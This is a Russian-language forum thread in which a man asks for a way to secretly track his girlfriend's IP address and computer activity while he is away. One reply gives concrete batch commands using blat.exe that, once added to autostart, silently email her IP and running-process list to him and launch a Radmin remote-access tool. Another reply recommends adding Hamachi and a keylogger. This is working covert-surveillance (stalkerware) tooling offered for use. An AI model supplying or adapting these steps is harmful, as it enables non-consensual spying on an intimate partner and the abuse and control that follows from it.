вобщем нужна программа которая бы посылала на мыло,асю,или ещё куда то айпи компа.. так как я уехжаю, и хочу знать чем занимается девушка за компом..радмин у неё стоит,вот только ип меняется частенько.. так что поможете? буду очень благодарен
как говорится, доверяй но проверяй) Code: http://dump.ru/file/3070528 Найдешь внутри файлик install.bat в нем замени: Ящик с которого тебе будет приходить ip,не забудь smtp адресс сервера сменить. Code: %SYSTEMROOT%/system32/blat.exe -install -server smtp.rambler.ru -port 587 -f левый@ящик -u логин -pw пароль Здесь ящик на который будет приходить ip. Code: blat.exe %systemroot%/system32/ip.txt -to твой@ящик blat.exe %systemroot%/system32/task.txt -to твой@ящик Обновленный install.bat снова засунь в архив и кидай в автозагрузку,при загрузке компа на почту будет приходить ip и список запущенных процессов. И само собой запустится радмин.
я контролирую свою девушку связкой радмин+хамачи хамаче работает по принцыпу локальной сети у каждого компа кде он установлен он раздаёт свой белый адрес ip ставь девушке хамачи на своём хамачи создай новую локальную сеть под паролем введи туда свою девушку и вуаля а если хочешь сматреть чем занимается по мыло то тут тебе уже нужно некое подобие троянчика а именно кейлоггер из полно в тырнете можно погуглить